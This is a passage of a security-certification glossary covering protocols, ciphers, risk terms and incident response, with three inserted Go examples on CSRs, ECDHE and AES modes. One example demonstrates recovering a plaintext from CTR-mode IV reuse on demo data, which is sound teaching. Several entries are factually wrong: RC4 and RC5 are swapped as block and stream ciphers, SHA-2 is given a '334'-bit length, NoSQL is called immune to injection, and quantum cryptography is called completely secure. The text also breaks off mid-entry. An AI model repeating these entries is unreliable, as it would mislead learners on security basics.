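The CSR, PEM and DER entries above in working form, added as an example (not the page's own code; the names and subject are placeholders). It generates a P-256 key, builds a CSR signed with that key, emits it as DER and as PEM armor, and then does what a CA does on receipt: strips the armor, checks the label, parses the DER and verifies the self-signature that proves the applicant holds the private key.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/pem"
	"errors"
	"fmt"
)

// BuildCSR generates a fresh P-256 key pair and a CSR for it.
// It returns the CSR in DER (binary) and PEM (base64-armored) form plus the key.
func BuildCSR(commonName string, dnsNames []string) (der, pemOut []byte, key *ecdsa.PrivateKey, err error) {
	key, err = ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, nil, nil, err
	}
	tmpl := &x509.CertificateRequest{
		Subject:  pkix.Name{CommonName: commonName, Organization: []string{"Example Org"}},
		DNSNames: dnsNames,
	}
	// The request is signed with the private key; the key itself never leaves this process.
	der, err = x509.CreateCertificateRequest(rand.Reader, tmpl, key)
	if err != nil {
		return nil, nil, nil, err
	}
	pemOut = pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE REQUEST", Bytes: der})
	return der, pemOut, key, nil
}

// VerifyDER parses a DER CSR and checks its self-signature, as a CA would
// before issuing: a valid signature proves possession of the private key.
func VerifyDER(der []byte) (*x509.CertificateRequest, error) {
	csr, err := x509.ParseCertificateRequest(der)
	if err != nil {
		return nil, err
	}
	if err := csr.CheckSignature(); err != nil {
		return nil, err
	}
	return csr, nil
}

// VerifyPEM strips the PEM armor, checks the label, and hands the DER on.
func VerifyPEM(pemIn []byte) (*x509.CertificateRequest, error) {
	block, _ := pem.Decode(pemIn)
	if block == nil {
		return nil, errors.New("no PEM block found")
	}
	if block.Type != "CERTIFICATE REQUEST" {
		return nil, fmt.Errorf("expected CERTIFICATE REQUEST, got %q", block.Type)
	}
	return VerifyDER(block.Bytes)
}

func main() {
	der, p, _, err := BuildCSR("example.test", []string{"example.test", "www.example.test"})
	if err != nil {
		panic(err)
	}
	fmt.Printf("DER: %d bytes\n%s", len(der), p)
	csr, err := VerifyPEM(p)
	if err != nil {
		panic(err)
	}
	fmt.Println("subject:", csr.Subject.CommonName, "SANs:", csr.DNSNames)
}
```

Flipping a single byte of the DER makes CheckSignature fail, which is the check that stops someone submitting a CSR for a public key they do not control.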

Digital cameras

Digital cameras typically include built-in storage and support additional storage by plugging in a memory card.

Authorization

Grant or restrict access to resources using an authorization method such as permissions.

DNS Attacks

DNS poisoning attacks attempt to corrupt DNS records. Many current DNS servers use Domain Name System Security Extensions (DNSSEC) to sign DNS records so that resolvers can detect forged responses, which prevents DNS poisoning attacks.

Common Standards that use Symmetric Algorithms

Data Encryption Standard (DES), Triple-DES (3DES), Advanced Encryption Standard (AES), Ron's Cipher (RC), Blowfish, and Twofish.

Wired Equivalent Privacy (WEP)

Defined by IEEE 802.11 ❑WEP was designed to provide a WLAN with a level of security and privacy comparable to what is usually expected of a wired LAN ❑Uses a predefined shared secret static key with the RC4 stream cipher: a 40-bit or 104-bit key combined with a 24-bit IV (marketed as 64-bit and 128-bit WEP). This system should not be used.

IRP includes

Definitions, Cyber Security Incident Response Team (CSIRT), Roles and responsibilities, Escalation, Reporting requirements, and Exercises.

Reporting requirements

Depending on the severity of the incident, security personnel might need to notify executives within the company of the incident.

Diameter

Diameter was created to overcome some of the limitations of RADIUS and is often used instead of RADIUS. Diameter can utilize EAP

Yagi-Uda Antenna

A directional antenna with a narrow beam width: it covers a limited field but reaches long distances, which also means an attacker using a similar antenna can connect from a much greater distance than with an omnidirectional antenna.

Asset Value (AV)

Dollar value of an asset

Educate Users on the following

Don't click on links within emails from unknown sources (no matter how curious you might be). ▪ Don't open attachments from unknown sources. ▪ Be wary of free downloads from the Internet. ▪ Limit information you post on social media sites. ▪ Back up your data regularly ▪ Keep your computer up to date with current patches ▪ Keep antivirus software up to date

Self-encrypting drives (SEDs)

Drives that can automatically encrypt any data stored on it. An SED includes the hardware and software to encrypt all data on the drive and securely store the encryption keys.

ECDHE

Elliptic Curve Diffie-Hellman Ephemeral: a key exchange in which each side generates a fresh elliptic-curve key pair for every session and derives the shared secret from it. It provides key agreement only; confidentiality and integrity of the session are then handled by the negotiated symmetric cipher and MAC or AEAD. The ephemeral component is what provides forward secrecy: because the session keys are never stored and are not derived from the server's long-term key, a later compromise of that long-term key does not let an attacker decrypt previously recorded sessions. The same construction with static, reused keys (ECDH) lacks this property.
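One ECDHE exchange on P-256 with Go's crypto/ecdh, added as an example (not the page's own code). The transcript binding and the SHA-256 key derivation are simplifications standing in for a real protocol's HKDF over the handshake; everything else is the mechanism the entry describes. Two runs give two unrelated keys, and a malformed peer value is rejected before any arithmetic happens.

```go
package main

import (
	"crypto/ecdh"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// Session is one side's ephemeral key pair. It is generated per handshake and
// dropped afterwards; nothing here is derived from a long-term key.
type Session struct {
	priv *ecdh.PrivateKey
}

func NewSession() (*Session, error) {
	priv, err := ecdh.P256().GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	return &Session{priv: priv}, nil
}

// PublicBytes is the value sent to the peer in the clear (the key share).
func (s *Session) PublicBytes() []byte {
	return s.priv.PublicKey().Bytes()
}

// Derive turns the peer's public value into a session key. NewPublicKey rejects
// points that are not on the curve, which blocks invalid-curve attacks. The KDF
// is a simplified stand-in (SHA-256 over secret||transcript, an assumption for
// the demo); a real protocol uses HKDF over the full handshake transcript.
func (s *Session) Derive(peerPub, transcript []byte) ([32]byte, error) {
	pub, err := ecdh.P256().NewPublicKey(peerPub)
	if err != nil {
		return [32]byte{}, errors.New("invalid peer public key: " + err.Error())
	}
	secret, err := s.priv.ECDH(pub)
	if err != nil {
		return [32]byte{}, err
	}
	return sha256.Sum256(append(append([]byte{}, secret...), transcript...)), nil
}

// Handshake runs one ECDHE exchange and returns the key each side computed.
func Handshake() (clientKey, serverKey [32]byte, err error) {
	client, err := NewSession()
	if err != nil {
		return clientKey, serverKey, err
	}
	server, err := NewSession()
	if err != nil {
		return clientKey, serverKey, err
	}
	// Binding the key to both public values ties it to this exchange. Stopping a
	// man-in-the-middle additionally needs the server to sign its share with a
	// certified long-term key, which is out of scope here.
	transcript := append(append([]byte{}, client.PublicBytes()...), server.PublicBytes()...)
	if clientKey, err = client.Derive(server.PublicBytes(), transcript); err != nil {
		return clientKey, serverKey, err
	}
	serverKey, err = server.Derive(client.PublicBytes(), transcript)
	return clientKey, serverKey, err
}

func main() {
	for i := 1; i <= 2; i++ {
		c, s, err := Handshake()
		if err != nil {
			panic(err)
		}
		fmt.Printf("session %d: client=%s server=%s match=%v\n", i,
			hex.EncodeToString(c[:8]), hex.EncodeToString(s[:8]), c == s)
	}
	// Each session prints a different key: the ephemeral pairs are never reused,
	// which is what gives forward secrecy.
}
```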

electromagnetic interference (EMI)

EMI originates from sources such as motors, power lines, and fluorescent lights and can be prevented with shielding.

ECC

Elliptic Curve Cryptography uses smaller key sizes to obtain the same level of security as RSA.

Enable MAC Filtering

Enabling media access control (MAC) filtering provides a small measure of security to a wireless network. MAC filtering can restrict access to a wireless network to specific clients. However, an attacker can use a sniffer to discover allowed MAC addresses and circumvent this form of network access control. It's relatively simple for an attacker to spoof a MAC address.

Protected Extensible Authentication Protocol (PEAP)

Encapsulates EAP methods within a TLS tunnel that provides authentication and potentially encryption. TLS gives encryption.

Difference between Hashing and Encryption

Encryption is a two-way function: what is encrypted can be decrypted with the proper key. Hashing is one-way: a hash cannot be reversed to recover the input, only compared against the hash of a candidate input.

MDM Full device encryption

Encryption protects against loss of confidentiality on multiple platforms, including workstations, servers, mobile devices, and data transmissions.

Cipher-block chaining (CBC)

Each plaintext block is XORed with the previous ciphertext block (the IV for the first block) before it is encrypted, so identical plaintext blocks produce different ciphertext blocks. This chaining adds diffusion and hides the patterns that ECB mode would reveal. It does not by itself protect against tampering, so CBC should be paired with a MAC, and it requires an unpredictable IV.
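The Counter-mode, IV and CBC entries above demonstrated with AES in one added example (not the page's own code; the key, IV and messages are constructed for the demo and a real system would draw key and IV from a CSPRNG). The first half reuses one IV for two CTR-mode messages and recovers the second plaintext from the first, which is the IV attack; the second half encrypts four identical blocks under ECB and under CBC and counts repeated ciphertext blocks.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"fmt"
)

// Demo key and IV (constructed; real code draws both from a CSPRNG and never reuses the IV).
var (
	demoKey = []byte("0123456789abcdef0123456789abcdef") // 32 bytes: AES-256
	demoIV  = []byte("fixed-iv-16bytes")                 // 16 bytes: one AES block
)

func mustCipher(key []byte) cipher.Block {
	b, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	return b
}

func xor(a, b []byte) []byte {
	n := len(a)
	if len(b) < n {
		n = len(b)
	}
	out := make([]byte, n)
	for i := range out {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// CTREncrypt: AES encrypts IV||counter to make a keystream that is XORed with
// the plaintext, so the block cipher behaves as a stream cipher (any length, no padding).
func CTREncrypt(key, iv, plaintext []byte) []byte {
	out := make([]byte, len(plaintext))
	cipher.NewCTR(mustCipher(key), iv).XORKeyStream(out, plaintext)
	return out
}

// RecoverFromIVReuse is the IV attack: two messages under the same key and IV
// share a keystream, so c1 XOR c2 == p1 XOR p2, and a known p1 yields p2
// without the key.
func RecoverFromIVReuse(c1, c2, knownP1 []byte) []byte {
	return xor(xor(c1, c2), knownP1)
}

// ECBEncrypt encrypts each block independently: no IV, no chaining.
func ECBEncrypt(key, plaintext []byte) []byte {
	b := mustCipher(key)
	out := make([]byte, len(plaintext))
	for i := 0; i < len(plaintext); i += b.BlockSize() {
		b.Encrypt(out[i:i+b.BlockSize()], plaintext[i:i+b.BlockSize()])
	}
	return out
}

// CBCEncrypt XORs each plaintext block with the previous ciphertext block
// (the IV for the first) before encrypting it. Input must be block-aligned.
func CBCEncrypt(key, iv, plaintext []byte) []byte {
	out := make([]byte, len(plaintext))
	cipher.NewCBCEncrypter(mustCipher(key), iv).CryptBlocks(out, plaintext)
	return out
}

// RepeatedBlocks counts 16-byte ciphertext blocks that duplicate an earlier block;
// under ECB, repeated plaintext shows through as repeated ciphertext.
func RepeatedBlocks(ct []byte) int {
	seen := map[string]bool{}
	n := 0
	for i := 0; i+16 <= len(ct); i += 16 {
		k := string(ct[i : i+16])
		if seen[k] {
			n++
		}
		seen[k] = true
	}
	return n
}

func main() {
	p1 := []byte("ATTACK AT DAWN..")
	p2 := []byte("RETREAT AT NOON!")
	c1 := CTREncrypt(demoKey, demoIV, p1)
	c2 := CTREncrypt(demoKey, demoIV, p2) // same IV reused: the bug
	fmt.Printf("recovered p2 without the key: %q\n", RecoverFromIVReuse(c1, c2, p1))

	repeated := bytes.Repeat([]byte("SAME PLAINTEXT.."), 4)
	fmt.Println("ECB repeated blocks:", RepeatedBlocks(ECBEncrypt(demoKey, repeated)))
	fmt.Println("CBC repeated blocks:", RepeatedBlocks(CBCEncrypt(demoKey, demoIV, repeated)))
}
```

Neither mode authenticates the data; in practice use an AEAD such as AES-GCM, which is CTR mode plus a built-in MAC and still fails just as badly on nonce reuse.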

ERM Software

Enterprise Risk Management Software

Entrapment

Entrapment is the process in which a law enforcement officer or a government agent encourages or induces a person to commit a crime when the potential criminal expresses a desire not to go ahead. Entrapment is a valid legal defense in a criminal prosecution.

Hoax Attack

Example: attacker posts link to fake AV software on multiple social networks. Makes people believe that the fake AV software is genuine.

Annual Rate of Occurrence (ARO)

Expected frequency with which a specific threat or risk will occur within a single year

External storage devices

External storage devices include any external device that has memory capabilities. They can transport malware without the user's knowledge and can be a source of data leakage. Malicious users can copy and steal a significant amount of information using an easily concealable thumb drive. Block them from the network and encrypt them.

ftps pros/cons

FTPS (FTP/SSL) is a name used to describe a number of ways that FTP software can perform secure file transfers. Each way involves the use of an SSL/TLS layer below the standard FTP protocol to encrypt the control and/or data channels.
Pros:
▪ Widely known and used
▪ The communication can be read and understood by a human
▪ Provides services for server-to-server file transfer
▪ SSL/TLS has good authentication mechanisms (X.509 certificate features)
▪ FTP and SSL/TLS support is built into many internet communications frameworks
Cons:
▪ Does not have a uniform directory listing format
▪ Requires a secondary DATA channel, which makes it hard to use behind firewalls
▪ Does not define a standard for file name character sets (encodings)
▪ Not all FTP servers support SSL/TLS
▪ Does not have a standard way to get and change file or directory attributes

Server redundancy

Failover clusters

FAT

File Allocation Table is a file system created by Microsoft and used for its earliest DOS operating systems.

Remove the heat

Fire extinguishers commonly use chemical agents or water to remove the heat.

Remove the fuel

Fire-suppression methods don't typically fight a fire this way, but of course, the fire will go out once all the material is burned.

White Box Test

Full Knowledge. Full information is provided. As much documentation as possible. Also called Crystal or Open Test. From a system administrator's perspective.

Backup Types

Full, Differential, Incremental, and Snapshots

FQDN

Fully Qualified Domain Name

MDM GPS tagging

GPS tagging (also called geotagging) adds geographical information to files such as pictures when posting them to social media web sites.

Social Engineering

Hackers use their social skills to trick people into revealing access credentials or other valuable information. Could be a friend or colleague.

HMAC

Hash-Based Message Authentication Code. Both sender and receiver computers would know the same secret key. If you can recognize the hashing algorithms such as MD5, SHA, and HMAC, it will help you answer many exam questions. For example, if a question asks what you would use to encrypt data and it lists hashing algorithms, you can quickly eliminate them because hashing algorithms don't encrypt data.

Credential management systems

Helps users store credentials collected over time. Users often have multiple credentials that they need to remember, especially when they access many web sites. Credential management systems help users store these credentials securely.

HIPS

Host Based Intrusion Prevention System. A Host-based intrusion prevention system (HIPS) is an installed software package which monitors a single host for suspicious activity by analyzing events occurring within that host. As a zero-day attack is an unknown vulnerability (a vulnerability that does not have a fix or a patch to prevent it), the best defence would be an intrusion prevention system.

Reverse Proxy

In computer networks, a reverse proxy is a type of proxy server that retrieves resources on behalf of a client from one or more servers. These resources are then returned to the client, appearing as if they originated from the proxy server itself.

Well-known ports: 0- 1023.

IANA assigns port numbers to commonly used protocols in the well-known ports range.

Registered ports: 1024- 49,151.

IANA registers these ports for companies as a convenience to the IT community.

Account Disablement Policy

Identifies what to do with accounts for employees who permanently leave or are on a leave of absence. Most policies require admins to disable the account ASAP. Disabling the account ensures the data associated with it remains available.

Displays

If displays show sensitive or private data, their view should be limited, use privacy screens.

Mandatory access control (MAC)

In a MAC environment everything is assigned a classification marker. Subjects are assigned a clearance level and objects are assigned a sensitivity label. MAC also includes the use of need to know. Need to know is a security restriction where some objects are restricted unless the subject has a need to know them.

Polymorphic Virus

In order to avoid detection by antivirus software, a polymorphic virus changes each time it is installed. The functionality of the virus remains the same, but its signature is changed.

MDM Storage segmentation

In some mobile devices, it's possible to use storage segmentation to isolate data.

Door and Lock Types

In the event of a fire, door access systems should allow personnel to exit the building without any form of authentication. Access points to data centers and server rooms should be limited to a single entrance and exit whenever possible. Types include cipher locks, proximity cards, biometric locks, tailgating controls, mantraps, cable locks, and locking cabinets.

WPA2

Indicates full compliance with 802.11i
➢ Replaces TKIP with Cipher Block Chaining Message Authentication Code Protocol (CCMP)
➢ AES-based encryption, stronger than TKIP
➢ Addresses some of the vulnerabilities of TKIP
❑ Mandatory for devices since 2006. All organizations should use this system.

Information classification training

Information classification is done by confidentiality and comprises three categories, namely: public use, internal use, and restricted use. Knowing these categories and how to handle data according to its category is essential in protecting the confidentiality of the data.

ISA

Interconnection Security Agreement is an agreement between two organizations that have connected systems. The agreement documents the technical requirements of the connected systems.

IANA

Internet Assigned Numbers Authority. The Internet Assigned Numbers Authority is a standards organization that oversees global IP address allocation, autonomous system number allocation, root zone management in the Domain Name System, media types, and other Internet Protocol-related symbols and Internet numbers.

Recover a deleted account

It is also possible to recover a deleted account. This is more complex than simply creating another account with the same name. Instead, administrators follow detailed procedures to recover the account.

Key Escrow

Key escrow addresses the possibility that a third party may need to access keys. Under the conditions of key escrow, the keys needed to encrypt/decrypt data are held in an escrow account (think of the term as it relates to home mortgages) and made available if that third party requests them. The third party in question is generally the government, but it could also be an employer if an employee's private messages have been called into question.

Linux-based or Unix-based systems

Open-source operating system available in many diverse distributions (distros).

Challenge Handshake Authentication Protocol (CHAP)

Like PAP, CHAP performs one-way authentication. However, authentication is performed through a three-way handshake (challenge, response, and acceptance messages) between a server and a client. The three-way handshake allows a client to be authenticated without sending credential information across a network. CHAP uses a handshake process where the server challenges the client. The client then responds with appropriate authentication information. Replaced by EAP. CHAP is more secure than PAP because passwords are not sent over the network in cleartext.

MAC Filter

List of authorized wireless client interface MAC addresses that is used by a wireless access point to block access to all non-authorized addresses

Shoulder Surfing

Looking over someone's shoulder either in person or with a camera in hopes of viewing sensitive information. Screen/Privacy filters help prevent shoulder surfing by obscuring the view of the screen without direct line-of-sight.

Message Digest Algorithm (MD)

MD5: 128-bit hash length, considered the weakest. ▪ Microsoft uses MD5 as part of NTLM to provide authentication.

MDM Application management

MDM tools can restrict what applications can run on mobile devices.

Printers and other multi-function devices (MFDs)

MFDs often have extra features that should be considered when purchasing them, especially if they will process sensitive information.

MS-CHAPv2

MS-CHAP is deprecated in favor of MS-CHAPv2. It includes several improvements, including the ability to perform mutual authentication.

IRP Roles and responsibilities

Many incident response plans identify specific roles for an incident response team along with their responsibilities.

Remove the oxygen

Many methods use a gas, such as carbon dioxide (CO2) to displace the oxygen.

File System Security

Many operating systems support file- and folder-level encryption.
▪ Linux systems support GNU Privacy Guard (GnuPG or GPG), which is a command-line tool used to encrypt and decrypt files with a password.
▪ Microsoft NTFS includes the Encrypting File System (EFS), available in most Windows operating systems.

Poisoning attack

Many protocols store data in cache for temporary access. Poisoning attacks attempt to corrupt the cache with different data.

MD5

Message Digest Algorithm 5. 128-bit hash length, considered the weakest. Microsoft uses MD5 as part of NTLM to provide authentication. It can still be used as a checksum to verify data integrity, but only against unintentional corruption.

Accounting (AAA)

Methods used to track user activity.

Perimeter

Military bases and many other organizations erect a fence around the entire perimeter of their land.

MDM Passwords and PINs

Mobile devices commonly support the use of passwords or personal identification numbers (PINs).

MaaS

Monitoring as a Service is a cloud delivery model that falls under anything as a service (XaaS). MaaS allows for the deployment of monitoring functionalities for several other services and applications within the cloud.

MDM Screen locks

Most devices support the use of a passcode or password to lock the device.

MPLS

Multi-Protocol Label Switching is a routing technique in telecommunications networks that directs data from one node to the next based on short path labels rather than long network addresses, thus avoiding complex lookups in a routing table and speeding traffic flows.

Time Synchronization

NTP is the most commonly used protocol for time synchronization, allowing systems to synchronize their time to within tens of milliseconds.

Secure Hash Algorithm (SHA)

SHA1: 160-bit hash length ▪ SHA2: 224, 256, 334, and 512 bit hash lengths

IEEE 802.1x

Network Access Control (NAC). A port-based authentication protocol. It requires users or devices to authenticate when they connect to a specific wireless access point or a specific physical port, and it can be implemented in both wireless and wired networks.

No SQL vs SQL

NoSQL databases are not vulnerable to SQL injection attacks.

802.1X/ Extensible Authentication Protocol (EAP)

Not a specific mechanism for authentication; rather, it is an authentication framework
❑ Controls port access between devices, APs, and servers
❑ Uses dynamic keys instead of static keys
❑ Requires a mutual authentication protocol
❑ Goes through the WLAN AP to reach the authentication server
➢ Permits a number of authentication methods
➢ RADIUS is the market de facto standard
➢ SecurID could be used
➢ Digital certificates could be used
- RADIUS uses UDP

Use pop-up blockers

Not only are pop-ups irritating, but they are also a security threat. Pop-ups (including pop-unders) represent unwanted programs running on the system, and they can jeopardize the system's well-being. This will be more effective on a mobile device rather than a terminal server.

Nonce

Number occurring once

Access Control Objects

Objects are items such as files, folders, shares, and printers that subjects access.

Risk Acceptance

Often the choice you must make when the cost of implementing any of the other four choices exceeds the value of the harm that would occur if the risk came to fruition.

One-way Hashing

Once something is hashed, it cannot be unhashed.

Exercises

One method of preparing for incident response is to perform exercises. These can test the response of all members of the team.

OTP (Acronym)

One-time password

MDM Geofencing

Organizations sometimes use GPS to create a virtual fence or geographic boundary using geofencing technologies.

PHI (Personal Health Information)

PII that includes medical or health information. Organizations have an obligation to protect PII and PHI and often identify procedures for handling and retaining PII in data policies.

PFX

PKCS#12 standard certificate

More common methods used to destroy data and sanitize media are:

Paper shredding, Pulping, degausser, and Pulverizing

RAID Parity

Parity computations are used in RAID drive arrays for fault tolerance by calculating the data in two drives and storing the results on a third. The parity is computed by XOR'ing a bit from drive 1 with a bit from drive 2 and storing the result on drive 3 (to learn about XOR, see OR). After a failed drive is replaced, the RAID controller rebuilds the lost data from the other two drives. RAID systems often have a "hot" spare drive ready and waiting to replace a drive that fails.

Grey Box Test

Partial Knowledge. Only Limited information is provided. An IP Address, a domain name, applications. Could also mean an internal test. From an insider's perspective.

Remote Access Security Protocols

Password Authentication Protocol (PAP), Challenge Handshake Authentication Protocol (CHAP), Microsoft CHAP (MS-CHAP), MS-CHAPv2, Remote Authentication Dial-In User Service (RADIUS), Diameter, and Terminal Access Controller Access-Control System Plus (TACACS +).

PAP

Password Authentication Protocol. An older authentication protocol where passwords are sent across the network in clear text. Rarely used today.

PBKDF2

Password-Based Key Derivation Function 2 is part of PKCS #5 v2.01. It applies some function (like a hash or HMAC) to the password or passphrase along with a salt to produce a derived key.

Patch management

Patch management procedures ensure that operating systems and applications are up to date with current patches. This protects systems against known vulnerabilities.

PCI

Payment Card Industry. PCI regulates financial transactions and provides security guidelines on how to protect PII, including credit card data. Requirement #11 says you must be scanned yearly and after big upgrades/modifications.

Containment (Incident Response Process)

Personnel attempt to contain or isolate the problem. This is often as simple as disconnecting a computer from a network.

electromagnetic pulse (EMP).

Systems can be protected from mild forms of EMP (a short burst of electromagnetic energy) such as electrostatic discharge and lightning.

PPTP

Point-to-Point Tunneling Protocol. A PPTP tunnel is instantiated by communication to the peer on TCP port 1723. This TCP connection is then used to initiate and manage a second GRE tunnel to the same peer. The PPTP GRE packet format is non-standard, including an additional acknowledgement field replacing the typical routing field in the GRE header. However, as in a normal GRE connection, those modified GRE packets are directly encapsulated into IP packets, and seen as IP protocol number 47.

PAT

Port Address Translation, is an extension to network address translation (NAT) that permits multiple devices on a local area network (LAN) to be mapped to a single public IP address. The goal of PAT is to conserve IP addresses.

Cloud Delivery Models

Private Cloud, Public, Community, Hybrid, and Cloud access security broker (CASB).

Data Classification Types

Public, Confidential, Proprietary, and Private

Public-Key Infrastructure X.509/Public-Key Cryptography Standards

Public-Key Infrastructure X.509 (PKIX) and Public-Key Cryptography Standards (PKCS)

Common methods used to destroy data and sanitize media are

Purging, File shredding, Wiping, and Burning

Quantum Cryptography

Quantum cryptography is a cryptosystem that is completely secure against being compromised without knowledge of the sender or the receiver of the messages.

RADIUS

RADIUS is a network protocol that is used to authenticate and authorize user access to a remote network. The term, RADIUS, is an acronym that stands for Remote Authentication Dial-In User Service. RADIUS is the market de facto standard. Uses UDP as a transport medium.

Remote Authentication Dial-In User Service (RADIUS)

RADIUS provides a centralized method of authentication for multiple remote access servers. RADIUS encrypts the password packets, but not the entire authentication process.

Ron's Cipher (RC)

RC4: Block cipher with 40-2,048 bit keys. RC5: Stream cipher with 2,048 bit keys.

RACE Integrity Primitives Evaluation Message Digest (RIPEMD)

RIPEMD: 160, 256, 320 bit hash lengths. If you can recognize the hashing algorithms such as MD5, SHA, and HMAC, it will help you answer many exam questions. For example, if a question asks what you would use to encrypt data and it lists hashing algorithms, you can quickly eliminate them because hashing algorithms don't encrypt data.

Secure Coding

Race condition, Error and exception handling, and Obfuscation.

Authorization (AAA)

Refers to access granted to resources. (Rights/Permissions)

Single Sign-On (SSO)

Refers to the ability of a user to log on or access multiple systems by providing credentials only once. Increases security because the user only needs to remember one set of credentials and is less likely to write them down. SSO does not provide authorization.

P12

Refers to the use of PKCS#12

RCP

Remote Copy Protocol command is meant to work like the CP (copy) command, except that it allows you to copy files and directories over the network to and from remote computers

RPC

Remote Procedure Call (RPC) is a programming interface that allows a remote computer to run programs on a local machine.

MDM Remote wipe

Remote wipe capabilities are useful if the phone is lost. It sends a remote signal to the device to wipe or erase all the data.

Pharming

Reroutes requests for legitimate websites to false websites. - Seeks to obtain personal or private (usually financial-related) information through domain spoofing. Rather than spamming you with malicious and mischievous e-mail requests to visit spoof Web sites which appear legitimate, pharming 'poisons' a DNS server by infusing false information into it, resulting in a user's request being redirected elsewhere. Your browser, however, will show you are at the correct Web site, which makes pharming a bit more serious and more difficult to detect. Phishing attempts to scam people one at a time with an e-mail, while pharming allows the scammers to target large groups of people at one time through domain spoofing.

RC4

Rivest Cipher version 4 is the most widely used software stream cipher and is used in popular Internet protocols such as Secure Sockets Layer (SSL) and Transport Layer Security (TLS). WEP also uses RC4 but WEP is not secure.

Development Life-Cycle Models

SDLC (Software Development Lifecycle), Waterfall, Agile, and Secure DevOps

sftp pros/cons

SFTP (SSH File Transfer Protocol) is a network protocol that provides file transfer and manipulation functionality over any reliable data stream. It is typically used with the SSH-2 protocol (TCP port 22) to provide secure file transfer, but is intended to be usable with other protocols as well.
Pros:
▪ Has a good standards background which strictly defines most (if not all) aspects of operations
▪ Has only one connection (no need for a DATA connection)
▪ The connection is always secured
▪ The directory listing is uniform and machine-readable
▪ The protocol includes operations for permission and attribute manipulation, file locking, and more functionality
Cons:
▪ The communication is binary and cannot be logged "as is" for human reading
▪ SSH keys are harder to manage and validate
▪ The standards define certain things as optional or recommended, which leads to certain compatibility problems between different software titles from different vendors
▪ No server-to-server copy and recursive directory removal operations
▪ No built-in SSH/SFTP support in VCL and .NET frameworks

Personnel Security Controls

Security guards, video surveillance, motion detection, barricades, and bollards. Fencing, lighting, and alarms all provide physical security. They are often used together to provide layered security.

SMB

Server Message Block, one version of which was also known as Common Internet File System (CIFS), is a network communication protocol for providing shared access to files, printers, and serial ports between nodes on a network.

Server and network rooms

Servers and network devices such as routers and switches are normally stored in areas where only the appropriate IT personnel can access them.

Shadow Copy

Shadow Copy (also known as Volume Snapshot Service, Volume Shadow Copy Service, or VSS) is a technology included in Microsoft Windows that can create backup copies or snapshots of computer files or volumes, even when they are in use.

Risk Transference

Sharing some of the burden of the risk with someone else.

Two detection methods

Signature-based IDSs and Heuristic/ behavioral-based detection

FIN Flag

Signifies that the connection is finished

Why Social Engineering Works

Social engineers typically use one or more psychology-based principles to increase the effectiveness of their attacks.

Cloud Models

Software as a Service SaaS, Platform as a Service PaaS, and Infrastructure as a Service IaaS.

Development (Secure Staging Environment)

Software developers use a development environment to create the application.

Disrupt the chain reaction

Some chemicals can disrupt the chain reaction of fires to stop them.

Secure work areas

Some companies restrict access to specific work areas when employees perform classified or restricted access tasks.

National versus international Frameworks

Some frameworks are used within a single country (and referred to as national frameworks), while others are used internationally.

Industry-specific Framework

Some frameworks only apply to certain industries. As an example, organizations that handle credit cards typically comply with the Payment Card Industry Data Security Standard (PCI DSS).

Impersonation

Some social engineers attempt to impersonate others to convince an authorized user to provide sensitive information, or help the attacker defeat a security control.

Protect system from malware

▪ Spam filter on mail gateways.
▪ Anti-malware software on mail gateways.
▪ All systems. All workstations and servers have anti-malware software installed.
▪ Boundaries or firewalls. Many networks include detection tools that monitor network traffic through the firewall.

Terminal Access Controller Access-Control System Plus (TACACS +)

TACACS + is an alternative to RADIUS, but it is proprietary to Cisco systems. Additionally, TACACS + encrypts the entire authentication process, whereas RADIUS encrypts only the password.

Lightweight Directory Access Protocol (LDAP)

Specifies formats and methods to query directories. In this context, a directory is a database of objects that provides a central access point to manage users, computers, and other directory objects. LDAP provides a clear syntax for object identification and management. LDAP uses TCP port 389.

Common Attacks

Spoofing attacks (MAC spoofing and IP spoofing), privilege escalation, man-in-the-middle (MITM) (ARP poisoning), DNS attacks (DNS poisoning), amplification attacks (Smurf attack), and SYN flood attacks.

Code Testing

Static code analysis, Dynamic analysis, Fuzzing techniques, Stress testing, Sandboxing, and Model verification.

SEH

Structured Exception Handling is a Windows mechanism for handling both hardware and software exceptions consistently. Those with programming experience might be familiar with the exception handling construct which is often represented as a try/except or try/catch block of code.

Access Control Subjects

Subjects are typically users or groups that access an object.

SCADA

Supervisory Control and Data Acquisition, a computer system for gathering and analyzing real-time data. SCADA systems are used to monitor and control a plant or equipment in industries such as telecommunications, water and waste control, energy, oil and gas refining, and transportation.

SSH Port

TCP 22

TACACS versions

Terminal Access Controller Access-Control System (TACACS) is less secure than XTACACS, which is a proprietary extension of TACACS, and less secure than TACACS+, which replaced TACACS and XTACACS.

Test (Secure Staging Environment)

Testers put the application through its paces and attempt to discover any bugs or errors.

DHCP

The Dynamic Host Configuration Protocol (DHCP) is a standardized network protocol used on Internet Protocol (IP) networks for distributing IP addresses for interfaces and services. DHCP makes use of port 67 by the server and port 68 by the client.

RTO (Recovery Time Objective)

The Recovery Time Objective (RTO) is the targeted duration of time and a service level within which a business process must be restored after a disaster (or disruption) in order to avoid unacceptable consequences associated with a break in business continuity.

SIP

The Session Initiation Protocol is a signaling protocol used for initiating, maintaining, and terminating real-time sessions that include voice, video and messaging applications.

URG Flag

The URG flag is used to inform a receiving station that certain data within a segment is urgent and should be prioritized. If the URG flag is set, the receiving station evaluates the urgent pointer, a 16-bit field in the TCP header. This pointer indicates how much of the data in the segment, counting from the first byte, is urgent. - The URG flag is used to send data on a second channel of a TCP connection. It doesn't make sense to set it unless you're also sending data. The data will be kept in a separate buffer on the receiving end, the program is signaled that there's urgent data available, and it reads using a special flag to the "recv" system call.

Why is WEP a weak security solution?

The WEP key is stored with a very small pool of random numbers to make the cipher text. As the random numbers are often reused, it becomes easy to derive the remaining WEP key. - WEP is based on RC4, but due to errors in design and implementation, WEP is weak in a number of areas, two of which are the use of a static common key and poor implementation of initialization vectors (IVs). When the WEP key is discovered, the attacker can join the network and then listen in on all other wireless client communications.

Fire Suppression

The different components of a fire are heat, oxygen, fuel, and a chain reaction creating the fire.

nslookup or dig

Two command-line tools used to test DNS. Microsoft systems include nslookup; Linux systems include dig.

Preparation (Incident Response Process)

The first step in the incident response process is preparation.

Spear Phishing

